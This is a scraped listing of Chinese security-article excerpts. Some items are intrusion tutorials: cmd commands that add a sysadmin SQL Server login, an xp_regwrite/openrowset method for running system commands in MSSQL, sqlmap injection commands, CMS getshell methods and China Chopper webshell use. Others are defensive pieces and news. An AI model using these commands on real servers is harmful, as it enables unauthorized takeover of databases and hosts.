入侵新手法 CMD下加sql账号
这个服务器可以用sql溢出,可惜就是找不到进一步的入侵方法,因而一直也没有拿下来。今天在校盟看到一篇文章,说是在cmd下也可以中入sql账号和密码,方法如下:
echo exec master.dbo.sp_addlogin 'rooto','******' >test.qry
echo exec sp_addsrvrolemember 'rooto','sysadmin' >>test.qry
cmd.exe /c isql -E /U alma ...
限制员工电脑向手机QQ传文件、禁止手机和电脑互传文件泄露商业机密
智能设备,尤其是智能手机,更新换代的速度越来越快,这些设备具有独立的操作系统,独立的运行空间,可以通过应用商店下载和安装任意软件,包括办公软件、视频软件、聊天软件、游戏软件、炒股软件等等。此外,我们还可以把手机当做U盘或者移动硬盘使用,如果手机自身的存储空间不足,我们还可以通过SD卡扩容,其读写速度越 ...
DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞
漏洞描述: 健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。 plus/adva ...
[深入学习Web安全] 深入利用XSS漏洞
前言
从这节课开始,小宅再次更改排版,希望能给大家更好的阅读体验。我们上节课就讲了XSS的基本原理其实就是HTML代码注入。这节课,我们将深入一点,学习一下How To Exploit XSS。
浅析XSS利用技术
XSS能干什么?
在我们学习XSS的利用技术之前,我们很有必要先知道XSS可以干什么?或者说有什么样的危害:
& ...
科讯 kesioncms 5.5以下漏洞拿shell方法原理总结(图文)
by:Timeless2008me 科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增大了拿shell 的难度。下面就个版本拿shell 的方法做一总结。 ...
中国菜刀的功能介绍和使用方法(黑站利器与后门利用测试工具)
中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。注:单独的菜刀没有 ...
了解防火墙,防火墙分为哪几个种类
随着INTERNET的迅猛发展,现在每家每户都拥有计算机并且都连接上了INTERNET,在网络给我们带来了方便的同时,互联网的弊端也慢慢显露出来,不少人在联网时会被人有意或者无意的攻击,从而导致自己存储在计算机上的资料被入侵者盗取或者丢失,所以防火墙就显得尤为重要,下面就为大家介绍防火墙的分类。
防火墙的分类
...
phpddos流量攻击预防方法
这类攻击有一个最大的特性,就是上传流量霎时增大,通常流量高达数十以至近百M,将整台效 劳器,以至将整台机柜的宽带堵住,使网站无法运转,而这样的攻击,我们无法从远程处理,一但那个phpshell运转,你的宽带将被全部占用,远程都无法 衔接。 被攻击后能做的只要联络机房的工作人员,让他进到你的效劳器里把你的IIS ...
互联网心脏出血漏洞怎么修复? 心脏出血漏洞修复教程
很多网友在找心脏出血漏洞修复教程,互联网心脏出血漏洞怎么修复呢?作为普通网民还如何防止这一漏洞呢?下文将会为大家详细介绍,一起来了解一下吧。
官方发布了漏洞的修复方案:因为这是一个旧版本OpenSSL的安全漏洞,开发者把服务器程序升级到OpenSSL1.0.1g可以解决。
目前包括支付宝、 ...
SQLMAP注入检查方法 11种常见SQLMAP使用方法详解
今天把我一直以来整理的sqlmap笔记发布上来供大家参考。
一共有11种常见SQLmap使用方法:
一、SQLMAP用于Access数据库注入
(1) 猜解是否能注入
win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"
Linux : .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"
(2) 猜解表
win: python sql ...
用最佳方法来管理加密密钥
“传输中的数据”密钥管理系统在加密数据“休息”的时候不起作用有两个原因。
第一个原因是传输中的数据加密没有密钥存储的概念。一旦你从一个密钥转移到另一个密钥,旧的密钥就不再需要了。然而,在加密存储的数据时,密钥是正常变化的。旧的密钥必须要保留,否则使用旧的密钥加密的数据就无法读了。第二个原因是如果这个 ...
DB2中的数据值加密
多年来,数据库已经能够阻止未经授权的人看到其中的数据,这通常是通过数据库管理器中的特权和权限来实现的。在当前的环境下,对存储数据的保密的需求日益增长。这意味着即使 DBA 对表中的数据有完全的访问权限,但是表中可能还有数据拥有者不希望任何其他人看到的某些信息。特别是对于基于 Web 的应用程序,这一问题就更加 ...
TCP/IP筛选限制登陆3389终端的解除方法[注册表]
有时候服务器管理员会用TCP/IP筛选限制端口,让我们无法登陆3389等等 需要解除这一限制,只需要导出注册表进行修改就行了:
TCP/IP筛选在注册表里有三处,分别是: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ ...
MSSQL中两种特别的执行命令的方法
以下方法都以需要SA权限为前提。 1, 沙盒模式的变通. 原始方法: 第一句开启沙盘模式:exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1 复制代码第二句利用jet.oledb执行系统命令:select * from openro ...
rootkits病毒的原理介绍以及解决办法
Rootkits病毒主要分为两大类: 第一种是进程注入式Rootkits,另一种是驱动级Rootkits。第一种Rootkits技术通常通过释放动态链接库(DLL)文件,并将它们注入到可执行文件及系统服务进程中运行,阻止操作系统及应用程序对被感染的文件进行访问。 第二种Rootkits技术比较复杂,在系统启动时Rootkits病毒以加载驱动程序的方 ...
让XP 3389支持多人登陆的方法
第一步:首先是在Windows XP上安装SP2正式版,按照常规方式安装即可,这里不再赘述。 第二步:准备一份版本较早的SP2终端服务器软件(据说从Build 2082开始该功能就被禁止了,所以最好使用之前版本),中文SP2测试版较难找到,我用的是英文版Build 2055,运行之后没有发现任何问题。你可以从琼殿技术社区下载Build 2055的 ...
安全设置Internet信息服务方法三则
什么?你觉得安全设置很复杂?没关系,通过我们介绍的IIS服务器安全设置的三个方法,就能很好地防范攻击。
基本设置 打好补丁删除共享
个人站长通常使用Windows服务器,但是我们通过租用或托管的服务器往往不会有专门的技术人员来进行安全设置,所以就导致了一些常见的基本漏洞仍然存在。其实,只要通过简单的安装服 ...
涉嫌窃取12306网站用户信息者被警方抓获
国际在线报道:据中国铁路官方微博消息,昨晚(25日),铁路公安机关将涉嫌窃取并泄露12306网站电子信息的两名犯罪嫌疑人抓获。
经查,嫌疑人蒋某某、施某某通过收集互联网某游戏网站以及其他多个网站泄露的用户名加密码信息,尝试登陆其他网站进行“撞库”,非法获取用户的其他信息,并谋取非法利益。
铁路 ...
李俊因能力强学历低,找工作碰壁,制造熊猫烧香病毒坑遍全网
引言《类说》中有云:“一念之误,乃至于此。”有时,一个一时兴起的念头,就会使人生轨迹发生巨大变化,最终走向无法挽回的道路。13年前肆虐互联网的互联网“毒王”熊猫烧香,就源自于程序员李俊的一念之差,这也对他的人生造成了不可磨灭的影响。那么,这位制造“熊猫烧香”电脑病毒的程序员,现在又过得怎样呢?01若是从 ...
你中过几个?史上20大计算机病毒
一谈计算机病毒,足以令人谈“毒”变色。硬盘数据被清空,网络连接被掐断,好好的机器变成了毒源,开始传染其他计算机。中了病毒,噩梦便开始了。有报告显示,仅2008年,计算机病毒在全球造成的经济损失就高达85亿美元。计算机病毒现身江湖已多年,可以追溯到计算机科学刚刚起步之时,那时已经有人想出破坏计算机系统的基 ...
